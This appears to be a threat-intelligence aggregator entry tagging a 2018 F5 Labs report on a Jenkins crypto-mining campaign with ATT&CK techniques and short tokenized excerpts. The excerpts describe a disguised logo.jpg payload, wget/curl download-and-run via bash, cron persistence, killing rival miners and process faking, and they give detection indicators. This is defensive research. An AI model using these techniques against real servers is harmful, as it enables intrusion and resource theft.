TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

F5 Labs

New Jenkins Campaign Hides Malware, Kills Competing Crypto-Miners

2018-07-06 · Read original ↗

ATT&CK techniques detected

12 predictions
T1053.003Cron
98%
“’ s process so the new malware variant can be installed instead. the last commands in the logo. jpg spearhead file change all downloaded files permissions to allow them to run and then runs the “ x ” file. figure 7 : changing downloaded files permissions and running file “ x ” pe…”
T1204.002Malicious File
89%
“: find / - name logo. jpg | xargs file | grep executable - cronjobs : - cronjobs downloading logo. jpg using curl or wget - processses : - a java process with a cmdline “ / usr / sbin / sshd ” the following command can ease the process of finding the offending process : pid = $ (…”
T1059.004Unix Shell
84%
“this decoded base64 string contains a command that first attempts to download the malicious file using wget. if that fails, curl is then used. the resulting downloaded file is then run by bash. let ’ s look into the downloaded bash script. spearhead bash script the spearhead bash…”
T1190Exploit Public-Facing Application
77%
“new jenkins campaign hides malware, kills competing crypto - miners f5 researchers recently discovered a new campaign targeting jenkins automation servers that exploits an unauthenticated code execution vulnerability ( cve - 2017 - 1000353 ). 1 this is yet another in a series of …”
T1496.001Compute Hijacking
73%
“multiple campaigns. it ’ s seems that more and more threat actors are discovering the ease of setup and potential profit that lies in malicious crypto mining and they want a piece of the pie. these newcomers try a variety of new approaches to gain a competitive advantage in the b…”
T1059.004Unix Shell
70%
“: attacker ’ s code on stack overflow the upd file is rewritten to check whether the malware process is currently running, and a cronjob is set to run it every minute. this is done by inspecting the pid in the bash. pid file. if it is not running, the run file is started. this be…”
T1496Resource Hijacking
56%
“multiple campaigns. it ’ s seems that more and more threat actors are discovering the ease of setup and potential profit that lies in malicious crypto mining and they want a piece of the pie. these newcomers try a variety of new approaches to gain a competitive advantage in the b…”
T1134.004Parent PID Spoofing
55%
“referenced earlier. faking the malware command line in this campaign, the attacker uses a process faker tool from 2002, called xhide, by schizoprenic xnuxer research. figure 12 : the xhide process faker tool menu looking into the h32 and h64 files, we see how xhide hides the proc…”
T1496.001Compute Hijacking
53%
“##hd related to the commonly used ssh server. this is an old and uncommon practice in this kind of operation, and we haven ’ t encountered it before. instead, the attacker usually changes the malware file name and then runs it. the mining malware the main goal of the java executa…”
T1059.004Unix Shell
37%
“exploited system. while reviewing the pkill commands, it seems that the main goal is to kill the competition because most process names are related to known cryptocurrency miners, for example, kworker34, 3 sourplum, 4 and various process names on imf - conference. org. 5 figure 5…”
T1496.001Compute Hijacking
32%
“39 monero coins mined to date more than thirty - nine monero crypto - coins have been mined to date, which at the time of this writing was valued at about $ 5, 100. 00 usd. examining the transactions log on the mining pool, we can see that the earliest logged payment to this wall…”
T1059.007JavaScript
32%
“new jenkins campaign hides malware, kills competing crypto - miners f5 researchers recently discovered a new campaign targeting jenkins automation servers that exploits an unauthenticated code execution vulnerability ( cve - 2017 - 1000353 ). 1 this is yet another in a series of …”

Summary

Threat actors continue to find creative yet relatively unsophisticated ways to launch new campaigns to reap profits from crypto-mining operations.